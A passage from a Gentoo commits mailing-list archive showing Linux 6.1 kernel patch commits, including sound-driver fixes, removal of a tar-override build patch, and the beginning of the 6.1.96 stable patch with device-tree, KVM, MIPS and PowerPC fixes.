+ 	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/amd/acp/acp-i2s.c b/sound/soc/amd/acp/acp-i2s.c
+index ac416572db0d3..3c78207f9ad9d 100644
+--- a/sound/soc/amd/acp/acp-i2s.c
++++ b/sound/soc/amd/acp/acp-i2s.c
+@@ -537,20 +537,12 @@ int asoc_acp_i2s_probe(struct snd_soc_dai *dai)
+ {
+ 	struct device *dev = dai->component->dev;
+ 	struct acp_dev_data *adata = dev_get_drvdata(dev);
+-	struct acp_resource *rsrc = adata->rsrc;
+-	unsigned int val;
+ 
+ 	if (!adata->acp_base) {
+ 		dev_err(dev, "I2S base is NULL\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	val = readl(adata->acp_base + rsrc->i2s_pin_cfg_offset);
+-	if (val != rsrc->i2s_mode) {
+-		dev_err(dev, "I2S Mode not supported val %x\n", val);
+-		return -EINVAL;
+-	}
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL_NS_GPL(asoc_acp_i2s_probe, SND_SOC_ACP_COMMON);
+diff --git a/sound/soc/fsl/fsl-asoc-card.c b/sound/soc/fsl/fsl-asoc-card.c
+index 8d14b5593658d..8b29099975c91 100644
+--- a/sound/soc/fsl/fsl-asoc-card.c
++++ b/sound/soc/fsl/fsl-asoc-card.c
+@@ -545,6 +545,8 @@ static int fsl_asoc_card_probe(struct platform_device *pdev)
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
++	priv->pdev = pdev;
++
+ 	cpu_np = of_parse_phandle(np, "audio-cpu", 0);
+ 	/* Give a chance to old DT binding */
+ 	if (!cpu_np)
+@@ -754,7 +756,6 @@ static int fsl_asoc_card_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* Initialize sound card */
+-	priv->pdev = pdev;
+ 	priv->card.dev = &pdev->dev;
+ 	priv->card.owner = THIS_MODULE;
+ 	ret = snd_soc_of_parse_card_name(&priv->card, "model");
+diff --git a/sound/soc/rockchip/rockchip_i2s_tdm.c b/sound/soc/rockchip/rockchip_i2s_tdm.c
+index 2e36a97077b99..bcea52fa45a50 100644
+--- a/sound/soc/rockchip/rockchip_i2s_tdm.c
++++ b/sound/soc/rockchip/rockchip_i2s_tdm.c
+@@ -651,8 +651,17 @@ static int rockchip_i2s_tdm_hw_params(struct snd_pcm_substream *substream,
+ 	int err;
+ 
+ 	if (i2s_tdm->is_master_mode) {
+-		struct clk *mclk = (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) ?
+-			i2s_tdm->mclk_tx : i2s_tdm->mclk_rx;
++		struct clk *mclk;
++
++		if (i2s_tdm->clk_trcm == TRCM_TX) {
++			mclk = i2s_tdm->mclk_tx;
++		} else if (i2s_tdm->clk_trcm == TRCM_RX) {
++			mclk = i2s_tdm->mclk_rx;
++		} else if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
++			mclk = i2s_tdm->mclk_tx;
++		} else {
++			mclk = i2s_tdm->mclk_rx;
++		}
+ 
+ 		err = clk_set_rate(mclk, DEFAULT_MCLK_FS * params_rate(params));
+ 		if (err)
+diff --git a/sound/synth/emux/soundfont.c b/sound/synth/emux/soundfont.c
+index 16f00097cb95a..eed47e4830248 100644
+--- a/sound/synth/emux/soundfont.c
++++ b/sound/synth/emux/soundfont.c
+@@ -701,7 +701,6 @@ load_data(struct snd_sf_list *sflist, const void __user *data, long count)
+ 	struct snd_soundfont *sf;
+ 	struct soundfont_sample_info sample_info;
+ 	struct snd_sf_sample *sp;
+-	long off;
+ 
+ 	/* patch must be opened */
+ 	sf = sflist->currsf;
+@@ -711,12 +710,16 @@ load_data(struct snd_sf_list *sflist, const void __user *data, long count)
+ 	if (is_special_type(sf->type))
+ 		return -EINVAL;
+ 
++	if (count < (long)sizeof(sample_info)) {
++		return -EINVAL;
++	}
+ 	if (copy_from_user(&sample_info, data, sizeof(sample_info)))
+ 		return -EFAULT;
++	data += sizeof(sample_info);
++	count -= sizeof(sample_info);
+ 
+-	off = sizeof(sample_info);
+-
+-	if (sample_info.size != (count-off)/2)
++	// SoundFont uses S16LE samples.
++	if (sample_info.size * 2 != count)
+ 		return -EINVAL;
+ 
+ 	/* Check for dup */
+@@ -744,7 +747,7 @@ load_data(struct snd_sf_list *sflist, const void __user *data, long count)
+ 		int  rc;
+ 		rc = sflist->callback.sample_new
+ 			(sflist->callback.private_data, sp, sflist->memhdr,
+-			 data + off, count - off);
++			 data, count);
+ 		if (rc < 0) {
+ 			sf_sample_delete(sflist, sf, sp);
+ 			return rc;
+@@ -957,10 +960,12 @@ load_guspatch(struct snd_sf_list *sflist, const char __user *data,
+ 	}
+ 	if (copy_from_user(&patch, data, sizeof(patch)))
+ 		return -EFAULT;
+-	
+ 	count -= sizeof(patch);
+ 	data += sizeof(patch);
+ 
++	if ((patch.len << (patch.mode & WAVE_16_BITS ? 1 : 0)) != count)
++		return -EINVAL;
++
+ 	sf = newsf(sflist, SNDRV_SFNT_PAT_TYPE_GUS|SNDRV_SFNT_PAT_SHARED, NULL);
+ 	if (sf == NULL)
+ 		return -ENOMEM;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-27 13:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-27 13:10 UTC (permalink / raw
  To: gentoo-commits

commit:     e3597205b8594d58064f7dd6a9e6ccfd4c35f48a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jun 27 13:10:31 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jun 27 13:10:31 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e3597205

Remove redundant patch

Removed:
2930_tar_override.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |  4 ---
 2930_tar_override.patch | 69 -------------------------------------------------
 2 files changed, 73 deletions(-)

diff --git a/0000_README b/0000_README
index 449aa50f..465332b9 100644
--- a/0000_README
+++ b/0000_README
@@ -459,10 +459,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:  2930_tar_override.patch
-From:   https://lore.kernel.org/lkml/20230412082743.350699-1-mgorny@gentoo.org/#t
-Desc:   kheaders: make it possible to override TAR
-
 Patch:  2940_handle-gcc-14-last-stmt-rename.patch
 From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
 Desc:   gcc-plugins: Rename last_stmt() for GCC 14+

diff --git a/2930_tar_override.patch b/2930_tar_override.patch
deleted file mode 100644
index aa62aae1..00000000
--- a/2930_tar_override.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From: "Michał Górny" <mgorny@gentoo.org>
-To: Dmitry Goldin <dgoldin+lkml@protonmail.ch>
-Cc: "Masahiro Yamada" <yamada.masahiro@socionext.com>,
-	linux-kernel@vger.kernel.org, "Michał Górny" <mgorny@gentoo.org>,
-	"Sam James" <sam@gentoo.org>,
-	"Masahiro Yamada" <masahiroy@kernel.org>
-Subject: [PATCH v2] kheaders: make it possible to override TAR
-Date: Wed, 12 Apr 2023 10:27:43 +0200	[thread overview]
-Message-ID: <20230412082743.350699-1-mgorny@gentoo.org> (raw)
-In-Reply-To: <CAK7LNATfrxu7BK0ZRq+qSjObiz6GpS3U5L=12vDys5_yy=Mdow@mail.gmail.com>
-
-Commit 86cdd2fdc4e39c388d39c7ba2396d1a9dfd66226 ("kheaders: make headers
-archive reproducible") introduced a number of options specific to GNU
-tar to the `tar` invocation in `gen_kheaders.sh` script.  This causes
-the script to fail to work on systems where `tar` is not GNU tar.  This
-can occur e.g. on recent Gentoo Linux installations that support using
-bsdtar from libarchive instead.
-
-Add a `TAR` make variable to make it possible to override the tar
-executable used, e.g. by specifying:
-
-  make TAR=gtar
-
-Link: https://bugs.gentoo.org/884061
-Reported-by: Sam James <sam@gentoo.org>
-Tested-by: Sam James <sam@gentoo.org>
-Co-developed-by: Masahiro Yamada <masahiroy@kernel.org>
-Signed-off-by: Michał Górny <mgorny@gentoo.org>
----
- Makefile               | 3 ++-
- kernel/gen_kheaders.sh | 2 +-
- 2 files changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/Makefile b/Makefile
-index 5aeea3d98..50045059c 100644
---- a/Makefile
-+++ b/Makefile
-@@ -520,6 +520,7 @@ LZMA		= lzma
- LZ4		= lz4c
- XZ		= xz
- ZSTD		= zstd
-+TAR		= tar
- 
- PAHOLE_FLAGS	= $(shell PAHOLE=$(PAHOLE) $(srctree)/scripts/pahole-flags.sh)
- 
-@@ -599,7 +600,7 @@ export RUSTC RUSTDOC RUSTFMT RUSTC_OR_CLIPPY_QUIET RUSTC_OR_CLIPPY BINDGEN CARGO
- export HOSTRUSTC KBUILD_HOSTRUSTFLAGS
- export CPP AR NM STRIP OBJCOPY OBJDUMP READELF PAHOLE RESOLVE_BTFIDS LEX YACC AWK INSTALLKERNEL
- export PERL PYTHON3 CHECK CHECKFLAGS MAKE UTS_MACHINE HOSTCXX
--export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD
-+export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD TAR
- export KBUILD_HOSTCXXFLAGS KBUILD_HOSTLDFLAGS KBUILD_HOSTLDLIBS LDFLAGS_MODULE
- export KBUILD_USERCFLAGS KBUILD_USERLDFLAGS
- 
-diff --git a/kernel/gen_kheaders.sh b/kernel/gen_kheaders.sh
-index 1ef9a8751..82d539648 100755
---- a/kernel/gen_kheaders.sh
-+++ b/kernel/gen_kheaders.sh
-@@ -86,7 +86,7 @@ find $cpio_dir -type f -print0 |
- # For compatibility with older versions of tar, files are fed to tar
- # pre-sorted, as --sort=name might not be available.
- find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \
--    tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
-+    ${TAR:-tar} "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
-     --owner=0 --group=0 --numeric-owner --no-recursion \
-     -I $XZ -cf $tarfile -C $cpio_dir/ -T - > /dev/null
- 
--- 
-2.40.0


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-27 12:33 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-27 12:33 UTC (permalink / raw
  To: gentoo-commits

commit:     6135309c0b95a96e9fc95c8917c0ac6c766c8909
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jun 27 12:33:34 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jun 27 12:33:34 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6135309c

Linux patch 6.1.96

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    6 +-
 1095_linux-6.1.96.patch | 4338 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4343 insertions(+), 1 deletion(-)

diff --git a/0000_README b/0000_README
index 34be8944..449aa50f 100644
--- a/0000_README
+++ b/0000_README
@@ -423,12 +423,16 @@ Patch:  1094_linux-6.1.95.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.95
 
+Patch:  1095_linux-6.1.96.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.96
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.
 
 Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
-From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
+From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch
 Desc:   Enable link security restrictions by default.
 
 Patch:  1700_sparc-address-warray-bound-warnings.patch

diff --git a/1095_linux-6.1.96.patch b/1095_linux-6.1.96.patch
new file mode 100644
index 00000000..61aa1cea
--- /dev/null
+++ b/1095_linux-6.1.96.patch
@@ -0,0 +1,4338 @@
+diff --git a/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml b/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml
+index 6e1c70e9275ec..6ab17aa38ecfa 100644
+--- a/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml
++++ b/Documentation/devicetree/bindings/i2c/google,cros-ec-i2c-tunnel.yaml
+@@ -21,7 +21,7 @@ description: |
+   google,cros-ec-spi or google,cros-ec-i2c.
+ 
+ allOf:
+-  - $ref: i2c-controller.yaml#
++  - $ref: /schemas/i2c/i2c-controller.yaml#
+ 
+ properties:
+   compatible:
+diff --git a/Makefile b/Makefile
+index b760de61167dc..83658d447564f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 95
++SUBLEVEL = 96
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -980,7 +980,6 @@ endif
+ ifdef CONFIG_LTO_CLANG
+ ifdef CONFIG_LTO_CLANG_THIN
+ CC_FLAGS_LTO	:= -flto=thin -fsplit-lto-unit
+-KBUILD_LDFLAGS	+= --thinlto-cache-dir=$(extmod_prefix).thinlto-cache
+ else
+ CC_FLAGS_LTO	:= -flto
+ endif
+@@ -1588,7 +1587,7 @@ endif # CONFIG_MODULES
+ # Directories & files removed with 'make clean'
+ CLEAN_FILES += include/ksym vmlinux.symvers modules-only.symvers \
+ 	       modules.builtin modules.builtin.modinfo modules.nsdeps \
+-	       compile_commands.json .thinlto-cache rust/test rust/doc \
++	       compile_commands.json rust/test rust/doc \
+ 	       .vmlinux.objs .vmlinux.export.c
+ 
+ # Directories & files removed with 'make mrproper'
+@@ -1884,7 +1883,7 @@ PHONY += compile_commands.json
+ 
+ clean-dirs := $(KBUILD_EXTMOD)
+ clean: rm-files := $(KBUILD_EXTMOD)/Module.symvers $(KBUILD_EXTMOD)/modules.nsdeps \
+-	$(KBUILD_EXTMOD)/compile_commands.json $(KBUILD_EXTMOD)/.thinlto-cache
++	$(KBUILD_EXTMOD)/compile_commands.json
+ 
+ PHONY += prepare
+ # now expand this into a simple variable to reduce the cost of shell evaluations
+diff --git a/arch/arm/boot/dts/exynos4210-smdkv310.dts b/arch/arm/boot/dts/exynos4210-smdkv310.dts
+index a5dfd7fd49b39..9de3cb3f3290d 100644
+--- a/arch/arm/boot/dts/exynos4210-smdkv310.dts
++++ b/arch/arm/boot/dts/exynos4210-smdkv310.dts
+@@ -84,7 +84,7 @@ eeprom@52 {
+ &keypad {
+ 	samsung,keypad-num-rows = <2>;
+ 	samsung,keypad-num-columns = <8>;
+-	linux,keypad-no-autorepeat;
++	linux,input-no-autorepeat;
+ 	wakeup-source;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&keypad_rows &keypad_cols>;
+diff --git a/arch/arm/boot/dts/exynos4412-origen.dts b/arch/arm/boot/dts/exynos4412-origen.dts
+index a3905e27b9cd9..473aad848848a 100644
+--- a/arch/arm/boot/dts/exynos4412-origen.dts
++++ b/arch/arm/boot/dts/exynos4412-origen.dts
+@@ -448,7 +448,7 @@ buck9_reg: BUCK9 {
+ &keypad {
+ 	samsung,keypad-num-rows = <3>;
+ 	samsung,keypad-num-columns = <2>;
+-	linux,keypad-no-autorepeat;
++	linux,input-no-autorepeat;
+ 	wakeup-source;
+ 	pinctrl-0 = <&keypad_rows &keypad_cols>;
+ 	pinctrl-names = "default";
+diff --git a/arch/arm/boot/dts/exynos4412-smdk4412.dts b/arch/arm/boot/dts/exynos4412-smdk4412.dts
+index a40ff394977c0..7e0d01498ce3e 100644
+--- a/arch/arm/boot/dts/exynos4412-smdk4412.dts
++++ b/arch/arm/boot/dts/exynos4412-smdk4412.dts
+@@ -65,7 +65,7 @@ cooling_map1: map1 {
+ &keypad {
+ 	samsung,keypad-num-rows = <3>;
+ 	samsung,keypad-num-columns = <8>;
+-	linux,keypad-no-autorepeat;
++	linux,input-no-autorepeat;
+ 	wakeup-source;
+ 	pinctrl-0 = <&keypad_rows &keypad_cols>;
+ 	pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index b4aef79650c69..0dd2f79c4f20f 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -930,7 +930,7 @@ pinctrl_gpio8: gpio8grp {
+ 	/* Verdin GPIO_9_DSI (pulled-up as active-low) */
+ 	pinctrl_gpio_9_dsi: gpio9dsigrp {
+ 		fsl,pins =
+-			<MX8MM_IOMUXC_NAND_RE_B_GPIO3_IO15		0x146>;	/* SODIMM 17 */
++			<MX8MM_IOMUXC_NAND_RE_B_GPIO3_IO15		0x1c6>;	/* SODIMM 17 */
+ 	};
+ 
+ 	/* Verdin GPIO_10_DSI (pulled-up as active-low) */
+diff --git a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+index 607cd6b4e9721..470e4e4aa8c78 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
++++ b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+@@ -32,7 +32,7 @@ reg_usdhc2_vmmc: usdhc2-vmmc {
+ 		regulator-name = "SD1_SPWR";
+ 		regulator-min-microvolt = <3000000>;
+ 		regulator-max-microvolt = <3000000>;
+-		gpio = <&lsio_gpio4 19 GPIO_ACTIVE_HIGH>;
++		gpio = <&lsio_gpio4 7 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+index 27f9a9f331346..5a212c05adc67 100644
+--- a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+@@ -60,7 +60,6 @@ &usdhc2 {
+ 	vmmc-supply = <&reg_usdhc2_vmmc>;
+ 	bus-width = <4>;
+ 	status = "okay";
+-	no-sdio;
+ 	no-mmc;
+ };
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index 0919e3b8f46ec..39c24e5ea8cd3 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -355,7 +355,7 @@ static void kvm_vgic_dist_destroy(struct kvm *kvm)
+ 
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+ 		list_for_each_entry_safe(rdreg, next, &dist->rd_regions, list)
+-			vgic_v3_free_redist_region(rdreg);
++			vgic_v3_free_redist_region(kvm, rdreg);
+ 		INIT_LIST_HEAD(&dist->rd_regions);
+ 	} else {
+ 		dist->vgic_cpu_base = VGIC_ADDR_UNDEF;
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index ae5a3a717655e..48e8b60ff1e33 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -942,8 +942,19 @@ static int vgic_v3_alloc_redist_region(struct kvm *kvm, uint32_t index,
+ 	return ret;
+ }
+ 
+-void vgic_v3_free_redist_region(struct vgic_redist_region *rdreg)
++void vgic_v3_free_redist_region(struct kvm *kvm, struct vgic_redist_region *rdreg)
+ {
++	struct kvm_vcpu *vcpu;
++	unsigned long c;
++
++	lockdep_assert_held(&kvm->arch.config_lock);
++
++	/* Garbage collect the region */
++	kvm_for_each_vcpu(c, vcpu, kvm) {
++		if (vcpu->arch.vgic_cpu.rdreg == rdreg)
++			vcpu->arch.vgic_cpu.rdreg = NULL;
++	}
++
+ 	list_del(&rdreg->list);
+ 	kfree(rdreg);
+ }
+@@ -968,7 +979,7 @@ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count)
+ 
+ 		mutex_lock(&kvm->arch.config_lock);
+ 		rdreg = vgic_v3_rdist_region_from_index(kvm, index);
+-		vgic_v3_free_redist_region(rdreg);
++		vgic_v3_free_redist_region(kvm, rdreg);
+ 		mutex_unlock(&kvm->arch.config_lock);
+ 		return ret;
+ 	}
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 9f80a580ca771..5fb0bfc07d856 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -301,7 +301,7 @@ vgic_v3_rd_region_size(struct kvm *kvm, struct vgic_redist_region *rdreg)
+ 
+ struct vgic_redist_region *vgic_v3_rdist_region_from_index(struct kvm *kvm,
+ 							   u32 index);
+-void vgic_v3_free_redist_region(struct vgic_redist_region *rdreg);
++void vgic_v3_free_redist_region(struct kvm *kvm, struct vgic_redist_region *rdreg);
+ 
+ bool vgic_v3_rdist_overlap(struct kvm *kvm, gpa_t base, size_t size);
+ 
+diff --git a/arch/mips/bmips/setup.c b/arch/mips/bmips/setup.c
+index 549a6392a3d2d..7615f0e30e9de 100644
+--- a/arch/mips/bmips/setup.c
++++ b/arch/mips/bmips/setup.c
+@@ -111,7 +111,8 @@ static void bcm6358_quirks(void)
+ 	 * RAC flush causes kernel panics on BCM6358 when booting from TP1
+ 	 * because the bootloader is not initializing it properly.
+ 	 */
+-	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31));
++	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31)) ||
++				  !!BMIPS_GET_CBR();
+ }
+ 
+ static void bcm6368_quirks(void)
+diff --git a/arch/mips/boot/dts/brcm/bcm63268.dtsi b/arch/mips/boot/dts/brcm/bcm63268.dtsi
+index 8926417a8fbcc..87c75faf4a3b3 100644
+--- a/arch/mips/boot/dts/brcm/bcm63268.dtsi
++++ b/arch/mips/boot/dts/brcm/bcm63268.dtsi
+@@ -109,6 +109,8 @@ timer-mfd@10000080 {
+ 			compatible = "brcm,bcm7038-twd", "simple-mfd", "syscon";
+ 			reg = <0x10000080 0x30>;
+ 			ranges = <0x0 0x10000080 0x30>;
++			#address-cells = <1>;
++			#size-cells = <1>;
+ 
+ 			wdt: watchdog@1c {
+ 				compatible = "brcm,bcm7038-wdt";
+diff --git a/arch/mips/pci/ops-rc32434.c b/arch/mips/pci/ops-rc32434.c
+index 874ed6df97683..34b9323bdabb0 100644
+--- a/arch/mips/pci/ops-rc32434.c
++++ b/arch/mips/pci/ops-rc32434.c
+@@ -112,8 +112,8 @@ static int read_config_dword(struct pci_bus *bus, unsigned int devfn,
+ 	 * gives them time to settle
+ 	 */
+ 	if (where == PCI_VENDOR_ID) {
+-		if (ret == 0xffffffff || ret == 0x00000000 ||
+-		    ret == 0x0000ffff || ret == 0xffff0000) {
++		if (*val == 0xffffffff || *val == 0x00000000 ||
++		    *val == 0x0000ffff || *val == 0xffff0000) {
+ 			if (delay > 4)
+ 				return 0;
+ 			delay *= 2;
+diff --git a/arch/mips/pci/pcie-octeon.c b/arch/mips/pci/pcie-octeon.c
+old mode 100644
+new mode 100755
+index c9edd3fb380df..9eaacd3d33880
+--- a/arch/mips/pci/pcie-octeon.c
++++ b/arch/mips/pci/pcie-octeon.c
+@@ -230,12 +230,18 @@ static inline uint64_t __cvmx_pcie_build_config_addr(int pcie_port, int bus,
+ {
+ 	union cvmx_pcie_address pcie_addr;
+ 	union cvmx_pciercx_cfg006 pciercx_cfg006;
++	union cvmx_pciercx_cfg032 pciercx_cfg032;
+ 
+ 	pciercx_cfg006.u32 =
+ 	    cvmx_pcie_cfgx_read(pcie_port, CVMX_PCIERCX_CFG006(pcie_port));
+ 	if ((bus <= pciercx_cfg006.s.pbnum) && (dev != 0))
+ 		return 0;
+ 
++	pciercx_cfg032.u32 =
++		cvmx_pcie_cfgx_read(pcie_port, CVMX_PCIERCX_CFG032(pcie_port));
++	if ((pciercx_cfg032.s.dlla == 0) || (pciercx_cfg032.s.lt == 1))
++		return 0;
++
+ 	pcie_addr.u64 = 0;
+ 	pcie_addr.config.upper = 2;
+ 	pcie_addr.config.io = 1;
+diff --git a/arch/powerpc/include/asm/hvcall.h b/arch/powerpc/include/asm/hvcall.h
+index 47bc10cdb70b5..a56ec2f124eae 100644
+--- a/arch/powerpc/include/asm/hvcall.h
++++ b/arch/powerpc/include/asm/hvcall.h
+@@ -493,7 +493,7 @@ long plpar_hcall_norets_notrace(unsigned long opcode, ...);
+  * Used for all but the craziest of phyp interfaces (see plpar_hcall9)
+  */
+ #define PLPAR_HCALL_BUFSIZE 4
+-long plpar_hcall(unsigned long opcode, unsigned long *retbuf, ...);
++long plpar_hcall(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL_BUFSIZE], ...);
+ 
+ /**
+  * plpar_hcall_raw: - Make a hypervisor call without calculating hcall stats
+@@ -507,7 +507,7 @@ long plpar_hcall(unsigned long opcode, unsigned long *retbuf, ...);
+  * plpar_hcall, but plpar_hcall_raw works in real mode and does not
+  * calculate hypervisor call statistics.
+  */
+-long plpar_hcall_raw(unsigned long opcode, unsigned long *retbuf, ...);
++long plpar_hcall_raw(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL_BUFSIZE], ...);
+ 
+ /**
+  * plpar_hcall9: - Make a pseries hypervisor call with up to 9 return arguments
+@@ -518,8 +518,8 @@ long plpar_hcall_raw(unsigned long opcode, unsigned long *retbuf, ...);
+  * PLPAR_HCALL9_BUFSIZE to size the return argument buffer.
+  */
+ #define PLPAR_HCALL9_BUFSIZE 9
+-long plpar_hcall9(unsigned long opcode, unsigned long *retbuf, ...);
+-long plpar_hcall9_raw(unsigned long opcode, unsigned long *retbuf, ...);
++long plpar_hcall9(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL9_BUFSIZE], ...);
++long plpar_hcall9_raw(unsigned long opcode, unsigned long retbuf[static PLPAR_HCALL9_BUFSIZE], ...);
+ 
+ /* pseries hcall tracing */
+ extern struct static_key hcall_tracepoint_key;
+diff --git a/arch/powerpc/include/asm/io.h b/arch/powerpc/include/asm/io.h
+index fc112a91d0c2f..0e1745e5125b0 100644
+--- a/arch/powerpc/include/asm/io.h
++++ b/arch/powerpc/include/asm/io.h
+@@ -553,12 +553,12 @@ __do_out_asm(_rec_outl, "stwbrx")
+ #define __do_inw(port)		_rec_inw(port)
+ #define __do_inl(port)		_rec_inl(port)
+ #else /* CONFIG_PPC32 */
+-#define __do_outb(val, port)	writeb(val,(PCI_IO_ADDR)_IO_BASE+port);
+-#define __do_outw(val, port)	writew(val,(PCI_IO_ADDR)_IO_BASE+port);
+-#define __do_outl(val, port)	writel(val,(PCI_IO_ADDR)_IO_BASE+port);
+-#define __do_inb(port)		readb((PCI_IO_ADDR)_IO_BASE + port);
+-#define __do_inw(port)		readw((PCI_IO_ADDR)_IO_BASE + port);
+-#define __do_inl(port)		readl((PCI_IO_ADDR)_IO_BASE + port);
++#define __do_outb(val, port)	writeb(val,(PCI_IO_ADDR)(_IO_BASE+port));
++#define __do_outw(val, port)	writew(val,(PCI_IO_ADDR)(_IO_BASE+port));
++#define __do_outl(val, port)	writel(val,(PCI_IO_ADDR)(_IO_BASE+port));
++#define __do_inb(port)		readb((PCI_IO_ADDR)(_IO_BASE + port));
++#define __do_inw(port)		readw((PCI_IO_ADDR)(_IO_BASE + port));
++#define __do_inl(port)		readl((PCI_IO_ADDR)(_IO_BASE + port));
+ #endif /* !CONFIG_PPC32 */
+ 
+ #ifdef CONFIG_EEH
+@@ -574,12 +574,12 @@ __do_out_asm(_rec_outl, "stwbrx")
+ #define __do_writesw(a, b, n)	_outsw(PCI_FIX_ADDR(a),(b),(n))
+ #define __do_writesl(a, b, n)	_outsl(PCI_FIX_ADDR(a),(b),(n))
+ 
+-#define __do_insb(p, b, n)	readsb((PCI_IO_ADDR)_IO_BASE+(p), (b), (n))
+-#define __do_insw(p, b, n)	readsw((PCI_IO_ADDR)_IO_BASE+(p), (b), (n))
+-#define __do_insl(p, b, n)	readsl((PCI_IO_ADDR)_IO_BASE+(p), (b), (n))
+-#define __do_outsb(p, b, n)	writesb((PCI_IO_ADDR)_IO_BASE+(p),(b),(n))
+-#define __do_outsw(p, b, n)	writesw((PCI_IO_ADDR)_IO_BASE+(p),(b),(n))
+-#define __do_outsl(p, b, n)	writesl((PCI_IO_ADDR)_IO_BASE+(p),(b),(n))
++#define __do_insb(p, b, n)	readsb((PCI_IO_ADDR)(_IO_BASE+(p)), (b), (n))
++#define __do_insw(p, b, n)	readsw((PCI_IO_ADDR)(_IO_BASE+(p)), (b), (n))
++#define __do_insl(p, b, n)	readsl((PCI_IO_ADDR)(_IO_BASE+(p)), (b), (n))
++#define __do_outsb(p, b, n)	writesb((PCI_IO_ADDR)(_IO_BASE+(p)),(b),(n))
++#define __do_outsw(p, b, n)	writesw((PCI_IO_ADDR)(_IO_BASE+(p)),(b),(n))
